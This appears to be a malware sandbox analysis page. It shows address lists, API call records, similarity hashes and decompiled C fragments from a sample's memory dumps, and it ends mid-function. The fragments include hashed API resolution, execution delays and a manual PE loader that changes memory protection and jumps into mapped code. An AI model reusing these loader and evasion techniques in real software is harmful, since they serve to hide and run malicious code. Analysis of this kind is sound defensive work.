0x6f4c0ad7
0x6f4c0adc
0x6f4c0afb
0x6f4c0afb
0x6f4c0afb
0x6f4c0afd
0x00000000
0x6f4c0afd
0x6f4c0ade
0x6f4c0ae2
0x6f4c0ae4
0x6f4c0aeb
0x6f4c0aeb
0x6f4c0af1
0x6f4c0af1
0x6f4c0af3
0x6f4c0af6
0x6f4c0af6
0x00000000
0x6f4c0af3
0x6f4c0ae6
0x6f4c0ae9
0x6f4c0aef
0x6f4c0aef
0x00000000
0x6f4c0aef
0x00000000
0x6f4c0ae9
0x6f4c0a8f
0x6f4c0a92
0x00000000
0x00000000
0x6f4c0a98
0x6f4c0a9d
0x6f4c0aa2
0x6f4c0ac1
0x6f4c0ac1
0x6f4c0acb
0x00000000
0x6f4c0acb
0x6f4c0aa4
0x6f4c0aa8
0x6f4c0aaa
0x6f4c0ab1
0x6f4c0ab1
0x6f4c0ab7
0x6f4c0ab7
0x6f4c0ab9
0x6f4c0abc
0x6f4c0abc
0x00000000
0x6f4c0ab9
0x6f4c0aac
0x6f4c0aaf
0x6f4c0ab5
0x6f4c0ab5
0x00000000
0x6f4c0ab5
0x00000000
0x6f4c0aaf
0x6f4c0a3e
0x6f4c0a40
0x6f4c0a7f
0x6f4c0a82
0x6f4c0df4
0x6f4c0df9
0x6f4c0dfe
0x6f4c0e1d
0x6f4c0e1d
0x6f4c0e27
0x00000000
0x6f4c0e27
0x6f4c0e00
0x6f4c0e04
0x6f4c0e06
0x6f4c0e0d
0x6f4c0e0d
0x6f4c0e13
0x6f4c0e13
0x6f4c0e15
0x6f4c0e18
0x6f4c0e18
0x00000000
0x6f4c0e15
0x6f4c0e08
0x6f4c0e0b
0x6f4c0e11
0x6f4c0e11
0x00000000
0x6f4c0e11
0x00000000
0x6f4c0e0b
0x00000000
0x6f4c0a88
0x6f4c0a46
0x6f4c0a4b
0x6f4c0a50
0x6f4c0a6f
0x6f4c0a6f
0x6f4c0a79
0x00000000
0x6f4c0a79
0x6f4c0a52
0x6f4c0a56
0x6f4c0a58
0x6f4c0a5f
0x6f4c0a5f
0x6f4c0a65
0x6f4c0a65
0x6f4c0a67
0x6f4c0a6a
0x6f4c0a6a
0x00000000
0x6f4c0a67
0x6f4c0a5a
0x6f4c0a5d
0x6f4c0a63
0x6f4c0a63
0x00000000
0x6f4c0a63
0x00000000
0x6f4c0a5d
0x6f4c09f4
0x6f4c09f6
0x00000000
0x00000000
0x6f4c0a00
0x6f4c0a05
0x6f4c0a0a
0x6f4c0a29
0x6f4c0a29
0x6f4c0a33
0x00000000
0x6f4c0a33
0x6f4c0a0c
0x6f4c0a10
0x6f4c0a12
0x6f4c0a19
0x6f4c0a19
0x6f4c0a1f
0x6f4c0a1f
0x6f4c0a21
0x6f4c0a24
0x6f4c0a24
0x00000000
0x6f4c0a21
0x6f4c0a14
0x6f4c0a17
0x6f4c0a1d
0x6f4c0a1d
0x00000000
0x6f4c0a1d
0x00000000
0x6f4c0a17
0x6f4c0959
0x6f4c095e
0x6f4c0963
0x6f4c0982
0x6f4c0982
0x6f4c098c
0x00000000
0x6f4c098c
0x6f4c0965
0x6f4c0969
0x6f4c096b
0x6f4c0972
0x6f4c0972
0x6f4c0978
0x6f4c0978
0x6f4c097a
0x6f4c097d
0x6f4c097d
0x00000000
0x6f4c097a
0x6f4c096d
0x6f4c0970
0x6f4c0976
0x6f4c0976
0x00000000
0x6f4c0976
0x00000000
0x6f4c089a
0x6f4c089c
0x6f4c0b01
0x6f4c0b06
0x6f4c0b09
0x6f4c0b0e
0x6f4c0b10
0x6f4c0b25
0x6f4c0b28
0x6f4c0bf6
0x6f4c0bfe
0x6f4c0c01
0x6f4c0c16
0x6f4c0c20
0x6f4c0c20
0x6f4c0c22
0x6f4c0c24
0x6f4c0c33
0x6f4c0c3f
0x6f4c0c43
0x6f4c0c46
0x6f4c0c49
0x6f4c0c4c
0x00000000
0x6f4c0c4c
0x6f4c0b38
0x6f4c0b4a
0x6f4c0b4e
0x6f4c0bda
0x6f4c0bda
0x6f4c0be0
0x6f4c0beb
0x6f4c0be2
0x6f4c0be2
0x6f4c0be2
0x00000000
0x6f4c0be0
0x6f4c0b5b
0x6f4c0b5c
0x6f4c0b5e
0x6f4c0b64
0x6f4c0fb3
0x6f4c0fb8
0x6f4c0fba
0x00000000
0x00000000
0x6f4c0fc0
0x6f4c0b7b
0x6f4c0b7f
0x6f4c0b84
0x6f4c0b96
0x6f4c0b9a
0x6f4c0ba5
0x6f4c0ba6
0x6f4c0ba7
0x6f4c0ba8
0x6f4c0baa
0x6f4c0bb5
0x6f4c0e2d
0x6f4c0e2d
0x6f4c0bb5
0x6f4c0bbb
0x6f4c0bc4
0x6f4c0e3f
0x6f4c0e55
0x6f4c0e57
0x6f4c0e59
0x6f4c0f94
0x6f4c0f9b
0x00000000
0x6f4c0f9b
0x6f4c0e68
0x6f4c0e76
0x6f4c0e90
0x6f4c0e92
0x6f4c0e94
0x6f4c0fa5
0x6f4c0faa
0x6f4c0fac
0x00000000
0x00000000
0x6f4c0fae
0x6f4c0ea8
0x6f4c0eb3
0x6f4c0ec2
0x6f4c0ed4
0x6f4c0ed6
0x6f4c0ed8
0x6f4c0ee5
0x6f4c0ee5
0x6f4c0ef5
0x6f4c0f06
0x6f4c0f0b
0x6f4c0f0d
0x6f4c0f0f
0x6f4c0f16
0x6f4c0f17
0x6f4c0f17
0x6f4c0f23
0x6f4c0f44
0x6f4c0f4d
0x6f4c0f59
0x6f4c0f65
0x6f4c0f6a
0x6f4c0f6f
0x6f4c0f75
0x6f4c0f75
0x6f4c0f7a
0x6f4c0f80
0x00000000
0x6f4c0f86
0x6f4c0f88
0x00000000
0x6f4c0f88
0x6f4c0bca
0x6f4c0bca
0x6f4c0bcf
0x6f4c0bd5
0x6f4c0bd5
0x00000000
0x6f4c0bcf
0x6f4c0bc4
0x6f4c0898
0x6f4c0808
0x6f4c0809
0x6f4c080b
0x6f4c0811
0x6f4c0dde
0x6f4c0de3
0x6f4c0de5
0x00000000
0x00000000
0x6f4c0deb
0x6f4c0828
0x6f4c082c
0x6f4c0831
0x6f4c0847
0x6f4c085e
0x6f4c0862
0x6f4c0c5a
0x6f4c0c5a
0x6f4c0862
0x6f4c0868
0x6f4c0871
0x6f4c0c69
0x6f4c0c7a
0x6f4c0c7f
0x6f4c0c81
0x6f4c0c83
0x6f4c0db4
0x6f4c0db8
0x00000000
0x6f4c0db8
0x6f4c0c8f
0x6f4c0cb4
0x6f4c0cb6
0x6f4c0cb8
0x6f4c0dd0
0x6f4c0dd5
0x6f4c0dd7
0x00000000
0x00000000
0x6f4c0dd9
0x6f4c0cc9
0x6f4c0cd7
0x6f4c0cde
0x6f4c0cdf
0x6f4c0ce0
0x6f4c0cf2
0x6f4c0cf4
0x6f4c0cf6
0x00000000
0x00000000
0x6f4c0cfe
0x6f4c0d19
0x6f4c0d1b
0x6f4c0d1d
0x6f4c0dc2
0x6f4c0dc7
0x6f4c0dc9
0x00000000
0x00000000
0x6f4c0dcb
0x6f4c0d23
0x6f4c0d2a
0x6f4c0d2e
0x6f4c0d99
0x6f4c0d99
0x6f4c0d9b
0x6f4c0da2
0x6f4c0da2
0x6f4c0da8
0x6f4c0da8
0x6f4c0daa
0x6f4c0daf
0x6f4c0daf
0x00000000
0x6f4c0daa
0x6f4c0d9d
0x6f4c0da0
0x6f4c0da6
0x6f4c0da6
0x00000000
0x6f4c0da6
0x00000000
0x6f4c0da0
0x6f4c0d30
0x6f4c0d30
0x6f4c0d32
0x6f4c0d3e
0x6f4c0d43
0x6f4c0d45
0x00000000
0x00000000
0x6f4c0d47
0x6f4c0d4b
0x6f4c0d52
0x6f4c0d53
0x6f4c0d54
0x6f4c0d56
0x00000000
0x00000000
0x6f4c0d58
0x6f4c0d5a
0x6f4c0d61
0x6f4c0d61
0x6f4c0d67
0x6f4c0d67
0x6f4c0d69
0x6f4c0d6e
0x6f4c0d6e
0x6f4c0d77
0x6f4c0d7c
0x6f4c0d81
0x6f4c0d87
0x6f4c0d87
0x6f4c0d8c
0x00000000
0x6f4c0d8c
0x6f4c0d5c
0x6f4c0d5f
0x6f4c0d65
0x6f4c0d65
0x00000000
0x6f4c0d65
0x00000000
0x6f4c0d93
0x6f4c0d93
0x6f4c0d94
0x6f4c0d94
0x00000000
0x6f4c0d32
0x6f4c0877
0x6f4c087c
0x6f4c0882
0x6f4c0882
0x00000000
0x6f4c0c59
0x6f4c0c59
0x6f4c0c59

APIs

GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,150C05FC,150C05FC), ref: 6F4C085E
GetSystemInfo.KERNELBASE(?,8E844D1E,8E844D1E,?,?,360D0C74,?,?,1E55AAEC,?,?,C0092A94,00000000,80000002,00000000,-000000FC), ref: 6F4C0C20
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,00000000,150C05FC,150C05FC,00000000,150C05FC,150C05FC), ref: 6F4C0CB4

Memory Dump Source

Source File: 00000000.00000002.749937166.000000006F4B1000.00000020.00020000.sdmp, Offset: 6F4B0000, based on PE: true

Associated: 00000000.00000002.749920504.000000006F4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749980349.000000006F4CA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749998070.000000006F4CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.750012504.000000006F4CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken$InfoSystem
String ID:
API String ID: 298373132-0
Opcode ID: f3ab5d4e352d2e7870de6d7514f5728dabb5dff392184a698c6507c4175d4a31
Instruction ID: 0b4041c178870e2d04b21a1095c73e333a3a661d83d1bd71de3a5163d7b5cd27
Opcode Fuzzy Hash: f3ab5d4e352d2e7870de6d7514f5728dabb5dff392184a698c6507c4175d4a31
Instruction Fuzzy Hash: 5B22D5B91083409AE724DB2CC840FEF77A5AF91708F10A91DE995DBAD1EB31E845C793

Uniqueness

Uniqueness Score: -1.00%

Function 6F4C2234, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E6F4C2234(void* __ecx, intOrPtr __edx, void* __esi) {
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr* _t5;
				intOrPtr _t11;
				intOrPtr* _t13;
				intOrPtr* _t15;

				_t11 = __edx;
				if(__ecx == 0) {
					 *_t15 = 0;
					_v4 = 0;
				} else {
					 *_t15 = E6F4C3AF8(0xffffd8f0, 0xffffffff, __ecx, 0);
					_v20 = _t11;
				}
				_t5 = E6F4C306C(0x60a28c5c, 0x11cab064, 0x60a28c5c, 0x60a28c5c);
				_t13 = _t5;
				if(_t13 != 0) {
					_t5 =  *_t13(0, _t15); // executed
				}
				return _t5;
			}

0x6f4c2234
0x6f4c2238
0x6f4c2254
0x6f4c2257
0x6f4c223a
0x6f4c2249
0x6f4c224c
0x6f4c224c
0x6f4c2267
0x6f4c226c
0x6f4c2270
0x6f4c2278
0x6f4c2278
0x6f4c227c

APIs

NtDelayExecution.NTDLL(00000000,00000000,60A28C5C,60A28C5C,FFFFFFFF,FFFFFFFF,6F4B4B17,00000000,00000000,?), ref: 6F4C2278

Memory Dump Source

Source File: 00000000.00000002.749937166.000000006F4B1000.00000020.00020000.sdmp, Offset: 6F4B0000, based on PE: true

Associated: 00000000.00000002.749920504.000000006F4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749980349.000000006F4CA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749998070.000000006F4CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.750012504.000000006F4CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
Instruction ID: c6a27354a85b7b4253f5ba072b0aa5102b88d6194da632abbada850f21808c76
Opcode Fuzzy Hash: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
Instruction Fuzzy Hash: 2CE065B410E302ADE74496288C01F7B36D8AF84710F20963DB468D66C4EA7494018362

Uniqueness

Uniqueness Score: -1.00%

Function 6F4C2820, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F4C2820(void* __ecx, long __edx, void* __esi, long _a4, long _a8, void* _a12) {
				long _v4;
				void* _t8;
				long _t10;
				PVOID* _t19;

				_v4 = __edx;
				 *_t19 = __ecx;
				if(E6F4C306C(0x60a28c5c, 0x414fdf7, 0x60a28c5c, 0x60a28c5c) == 0) {
					L3:
					_t8 =  *_t19;
				} else {
					_t10 = NtAllocateVirtualMemory(_a12, _t19, 0,  &_v4, _a4, _a8); // executed
					if(_t10 == 0) {
						goto L3;
					} else {
						_t8 = 0;
					}
				}
				return _t8;
			}

0x6f4c2827
0x6f4c2830
0x6f4c283e
0x6f4c2861
0x6f4c2861
0x6f4c2840
0x6f4c2857
0x6f4c285b
0x00000000
0x6f4c285d
0x6f4c285d
0x6f4c285d
0x6f4c285b
0x6f4c2866

APIs

NtAllocateVirtualMemory.NTDLL(6F4C88E6,?,00000000,000000FF,6F4C88E6,6F4C88E6,60A28C5C,60A28C5C,?,?,6F4C88E6,00003000,00000004,000000FF), ref: 6F4C2857

Memory Dump Source

Source File: 00000000.00000002.749937166.000000006F4B1000.00000020.00020000.sdmp, Offset: 6F4B0000, based on PE: true

Associated: 00000000.00000002.749920504.000000006F4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749980349.000000006F4CA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749998070.000000006F4CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.750012504.000000006F4CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
Instruction ID: 1c9ba713a58d9ec00fc04ddc7894a4c6f035eb10141433c3fb941abf8b7dcb09
Opcode Fuzzy Hash: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
Instruction Fuzzy Hash: E7E06575209742AFFB08DA19CC10E7FB7E9EF84604F109D2DB494D6650DB70D9009732

Uniqueness

Uniqueness Score: -1.00%

Function 6F4C3138, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E6F4C3138(intOrPtr* __ecx) {
				void* _t1;

				_push(E6F4C34B0);
				_push(1); // executed
				_t1 =  *__ecx(); // executed
				return _t1;
			}

0x6f4c3138
0x6f4c313d
0x6f4c313f
0x6f4c3141

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,6F4C34B0,6F4C3128,60A28C5C,60A28C5C,?,6F4B6C99,00000000), ref: 6F4C313F

Memory Dump Source

Source File: 00000000.00000002.749937166.000000006F4B1000.00000020.00020000.sdmp, Offset: 6F4B0000, based on PE: true

Associated: 00000000.00000002.749920504.000000006F4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749980349.000000006F4CA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749998070.000000006F4CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.750012504.000000006F4CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: 74d680e4d06a4c639df8cecc77391b28758c9248592e9e3575bc6cad7493b92f
Instruction ID: 746ca18cb2079ceafa1d058435c3cf222ef2d887a3d0909cc2624d07c752c2af
Opcode Fuzzy Hash: 74d680e4d06a4c639df8cecc77391b28758c9248592e9e3575bc6cad7493b92f
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0103141B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 173
memoryCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E0103141B(long __ebx, void* __edi, long __esi, intOrPtr* _a4, intOrPtr _a814471233) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				char* _v72;
				int _v76;
				long _v80;
				long _v84;
				DWORD* _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				char* _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				char* _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				char _v188;
				intOrPtr* _t141;
				int _t147;
				int _t155;
				int _t159;
				intOrPtr _t174;
				intOrPtr _t186;
				unsigned int _t203;
				void* _t236;
				intOrPtr _t239;
				intOrPtr _t244;
				void* _t246;
				intOrPtr* _t250;
				intOrPtr _t258;
				DWORD* _t270;
				void* _t274;
				intOrPtr* _t277;
				intOrPtr* _t278;

				_t141 = _a4;
				_v20 = 0;
				_t246 =  *((intOrPtr*)(_t141 + 0x6c));
				 *0x1034418 = 1;
				asm("movaps xmm0, [0x1033010]");
				asm("movups [0x1034428], xmm0");
				_v48 = _t141;
				_v52 =  *((intOrPtr*)(_t141 + 0x1c));
				_v56 =  *((intOrPtr*)(_v48 + 0x54));
				_v188 = _t246;
				_v184 =  *((intOrPtr*)(_t141 + 0x38));
				_v180 = 4;
				_v176 =  &_v20;
				_v60 =  *((intOrPtr*)(_v48 + 0xc));
				_v64 = 4;
				_v68 = _t246;
				_v72 =  &_v20;
				_t147 = VirtualProtect(__edi, __esi, __ebx, _t270); // executed
				_v76 = _t147;
				_v188 = _v68;
				_v184 = 0;
				_v180 =  *((intOrPtr*)(_v48 + 0x38));
				_v80 = 0x400;
				_v84 = 2;
				_v88 =  &_v20;
				_v92 = 0;
				E01031E1E();
				E010322BF(_v68,  *((intOrPtr*)(_v48 + 0x3c)), _v56);
				E01031E1E( *((intOrPtr*)(_v48 + 0x3c)), 0, _v56);
				_t155 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
				_t277 = _t274 - 0x8c;
				_t236 = _v68;
				_t258 =  *((intOrPtr*)(_t236 + 0x3c));
				_v96 = _t155;
				_v100 = _v68 + 0x3c;
				_v104 = _t236;
				_v108 = _t258;
				if(_t258 != 0) {
					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v112 = _v104;
				if(_v60 != 0) {
					_v136 = 0;
					_v132 = _v112 + 0x18 + ( *(_v112 + 0x14) & 0x0000ffff);
					while(1) {
						_t174 = _v132;
						_t203 =  *(_t174 + 0x24);
						_v140 = _t174;
						_v144 = _t203 >> 0x0000001e & 0x00000001;
						_v148 = _t203 >> 0x1f;
						_v188 = _v68 +  *((intOrPtr*)(_t174 + 0xc));
						_v184 =  *((intOrPtr*)(_v140 + 8));
						_v180 =  *((intOrPtr*)(0x1034418 + (_v144 << 4) + (_v148 << 3) + ((_t203 >> 0x0000001d & 0x00000001) << 2)));
						_v176 =  &_v20;
						_v152 = _v136;
						_t186 =  *_v52();
						_t277 = _t277 - 0x10;
						_t244 = _v152 + 1;
						_v156 = _t186;
						_v136 = _t244;
						_v132 = _v140 + 0x28;
						if(_t244 == _v60) {
							goto L5;
						}
						_a814471233 = _a814471233 - 1;
					}
				}
				L5:
				 *_t277 = _v68;
				_v116 = _v68 +  *((intOrPtr*)(_v48 + 0x48));
				_t159 = DisableThreadLibraryCalls(??);
				_t278 = _t277 - 4;
				_t239 =  *_v100;
				_v120 = _t159;
				_v124 = _t239;
				_v128 = _v68;
				if(_t239 != 0) {
					_v128 = _v68 + (_v124 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t250 = _v48;
				_v44 =  *((intOrPtr*)(_t250 + 0x5c));
				_v40 =  *((intOrPtr*)(_t250 + 0x60));
				_v36 =  *((intOrPtr*)(_t250 + 0x64));
				_v32 =  *_t250;
				_v28 =  *((intOrPtr*)(_t250 + 0x24));
				_v24 = _v116;
				 *_t278 = _t250;
				_v188 = 0;
				_v184 = 0x70;
				_v160 =  &_v44;
				_v164 = 0;
				_v168 = 0x70;
				_v172 =  *((intOrPtr*)(_v128 + 0x28));
				E01031E1E();
				if(_v172 != 0) {
					_t277 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x01031427
0x01031435
0x0103143c
0x0103143f
0x01031449
0x01031450
0x0103145a
0x01031460
0x01031469
0x01031472
0x01031475
0x01031479
0x01031481
0x01031488
0x0103148b
0x0103148e
0x01031491
0x01031494
0x010314ae
0x010314b4
0x010314b7
0x010314bf
0x010314c3
0x010314c6
0x010314c9
0x010314cc
0x010314cf
0x010314eb
0x01031508
0x0103152d
0x0103152f
0x01031538
0x0103153b
0x01031545
0x01031548
0x0103154b
0x0103154e
0x01031551
0x01031568
0x01031568
0x01031574
0x01031577
0x0103174d
0x01031753
0x010315f2
0x010315f2
0x0103160a
0x0103160d
0x0103161b
0x0103162c
0x01031658
0x0103165b
0x0103165f
0x01031663
0x0103166a
0x01031670
0x01031672
0x01031684
0x0103168c
0x01031692
0x01031698
0x0103169b
0x00000000
0x00000000
0x010316a5
0x010316a5
0x010315f2
0x01031599
0x010315a7
0x010315af
0x010315b2
0x010315b4
0x010315ba
0x010315c6
0x010315c9
0x010315cc
0x010315cf
0x010315ea
0x010315ea
0x010316d5
0x010316db
0x010316e1
0x010316e7
0x010316ec
0x010316f2
0x010316f8
0x010316fb
0x010316fe
0x01031706
0x0103170e
0x01031714
0x0103171a
0x01031720
0x01031726
0x01031734
0x0103158c
0x01031592
0x01031592
0x010316bf

APIs

VirtualProtect.KERNELBASE ref: 01031494
VirtualProtect.KERNELBASE ref: 0103152D

Strings

p, xrefs: 01031706

Memory Dump Source

Source File: 00000000.00000002.749390798.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: p
API String ID: 544645111-2181537457
Opcode ID: e03f4df7ef474a99ffe3194595901db3c2b815cafed919f1bdfa990514deb29d
Instruction ID: 33ed75cf326e1a143cd7f42c84fabeb4324ef50b0867f6096b16cd6f5e1b2b07
Opcode Fuzzy Hash: e03f4df7ef474a99ffe3194595901db3c2b815cafed919f1bdfa990514deb29d
Instruction Fuzzy Hash: 2981AAB4E04219DFDB14CF99C880AADFBF1BF88300F15856AE959AB351D334A841CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6F4C5E84, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F4C5E84(void* __ecx, void* __eflags, void* _a4, char _a8) {
				long _v12;
				void* __esi;
				long _t9;
				long _t10;
				int _t12;
				void* _t18;
				void** _t19;
				DWORD* _t20;

				_t18 = __ecx;
				_t19 = __ecx + 0xc;
				if(E6F4BC280(_t19) == 0) {
					_t2 =  &_a8; // 0x6f4c5d79
					_v12 =  *_t2;
					if(E6F4C3064(0x8e844d1e, 0xed3ed1cc) == 0) {
						_t9 = 0x7f;
					} else {
						_t12 = ReadFile( *_t19, _a4, _v12, _t20, 0); // executed
						if(_t12 == 0) {
							_t9 = E6F4C35F0(_t18);
						} else {
							_t9 = 0;
						}
					}
					 *((intOrPtr*)(_t18 + 8)) = _t9;
					if(_t9 == 0) {
						_t10 = _v12;
					} else {
						_t10 = 0;
						_v12 = 0;
					}
				} else {
					_t10 = 0;
				}
				return _t10;
			}

0x6f4c5e87
0x6f4c5e89
0x6f4c5e95
0x6f4c5e9b
0x6f4c5e9f
0x6f4c5eb5
0x6f4c5ed4
0x6f4c5eb7
0x6f4c5ec8
0x6f4c5ecc
0x6f4c5eec
0x6f4c5ece
0x6f4c5ece
0x6f4c5ece
0x6f4c5ecc
0x6f4c5ed5
0x6f4c5eda
0x6f4c5ee3
0x6f4c5edc
0x6f4c5edc
0x6f4c5ede
0x6f4c5ede
0x6f4c5e97
0x6f4c5e97
0x6f4c5e97
0x6f4c5ee9

APIs

ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,8E844D1E,ED3ED1CC,?,?,?,6F4C5D79,00000000,?,00000000,?), ref: 6F4C5EC8

Strings

y]Lo, xrefs: 6F4C5E9B

Memory Dump Source

Source File: 00000000.00000002.749937166.000000006F4B1000.00000020.00020000.sdmp, Offset: 6F4B0000, based on PE: true

Associated: 00000000.00000002.749920504.000000006F4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749980349.000000006F4CA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749998070.000000006F4CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.750012504.000000006F4CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileRead
String ID: y]Lo
API String ID: 2738559852-3537301801
Opcode ID: 84a6624f29361c2a8c98364ad473c0758c1d35c4603bde8f3404ef6b27891e48
Instruction ID: 773174af79877c728044ab968f3f007918a168ad7f4fbaffbc2cfcc2722372c7
Opcode Fuzzy Hash: 84a6624f29361c2a8c98364ad473c0758c1d35c4603bde8f3404ef6b27891e48
Instruction Fuzzy Hash: 64F08139258306AED751EB3C9E00EAE77D5EF49250F10592EA895C2A80EA32E805C663

Uniqueness

Uniqueness Score: -1.00%

Function 6F4C10A4, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E6F4C10A4(void* __ebx, void* __ecx) {
				intOrPtr* _t34;
				long* _t55;
				long* _t59;
				intOrPtr* _t64;
				void* _t73;
				void* _t74;
				void* _t79;
				long* _t80;

				_t74 = __ecx;
				_t80[7] = 0;
				_t64 = E6F4C306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
				if(_t64 != 0) {
					 *_t64(_t74, 8,  &(_t80[7]));
				}
				_t55 = _t80;
				 *_t55 = _t80[7];
				_t55[1] = 1;
				if(E6F4BC280(_t55) != 0) {
					L6:
					if(_t80[1] != 0) {
						E6F4BBB44(_t80);
					}
					return 0;
				}
				_t80[6] = 0;
				if(E6F4C306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
					GetTokenInformation(_t80[4], 0x19, 0, 0,  &(_t80[6])); // executed
				}
				_t30 = _t80[6];
				if(_t80[6] != 0) {
					E6F4BF584( &(_t80[3]), _t30);
					_t59 =  &(_t80[3]);
					_t73 = E6F4BF4BC(_t59, 0);
					_t34 = E6F4C306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
					if (_t34 == 0) goto L33;
					 *_t34 =  *_t34 + _t34;
					 *((intOrPtr*)(_t79 + 0x50182444)) =  *((intOrPtr*)(_t79 + 0x50182444)) + _t59;
				} else {
					goto L6;
				}
			}

0x6f4c10b3
0x6f4c10b5
0x6f4c10c4
0x6f4c10c8
0x6f4c10d2
0x6f4c10d2
0x6f4c10d8
0x6f4c10db
0x6f4c10dd
0x6f4c10e8
0x6f4c1122
0x6f4c1127
0x6f4c112c
0x6f4c112c
0x00000000
0x6f4c1131
0x6f4c10f4
0x6f4c1107
0x6f4c1118
0x6f4c1118
0x6f4c111a
0x6f4c1120
0x6f4c113e
0x6f4c1145
0x6f4c114e
0x6f4c115c
0x6f4c1165
0x6f4c1168
0x6f4c116a
0x00000000
0x00000000
0x00000000

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6F4C1118
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6F4C117B

Memory Dump Source

Source File: 00000000.00000002.749937166.000000006F4B1000.00000020.00020000.sdmp, Offset: 6F4B0000, based on PE: true

Associated: 00000000.00000002.749920504.000000006F4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749980349.000000006F4CA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749998070.000000006F4CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.750012504.000000006F4CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: d4114acdae47b760778368f229c105cfa951edf473a092887fb2ca255ca5d737
Instruction ID: 668720f9c5418e9cda2c7c9a744df1891ac3b983ceaba3417a04b40d1ff23049
Opcode Fuzzy Hash: d4114acdae47b760778368f229c105cfa951edf473a092887fb2ca255ca5d737
Instruction Fuzzy Hash: A741367C2443426AE705D5689C50FBF76E99FC5700F10982DB990EAAD4DB38D846C7A3

Uniqueness

Uniqueness Score: -1.00%

Function 6F4C57B4, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E6F4C57B4(void* __ecx, char* _a4, intOrPtr _a8) {
				int _v16;
				int _v20;
				intOrPtr _t11;
				int* _t12;
				int _t13;
				void* _t23;
				char* _t35;
				int* _t38;

				_push(_t34);
				_t23 = __ecx;
				_t11 =  *((intOrPtr*)(__ecx + 4));
				if(_t11 == 0 || _t11 == 0xffffffff) {
					_t12 = 1;
				} else {
					_t12 = 0;
				}
				if(_t12 != 0) {
					L10:
					_t13 = 0;
				} else {
					_t35 = _a4;
					if(_t35 == 0 ||  *_t35 != 0) {
						_v20 = 0;
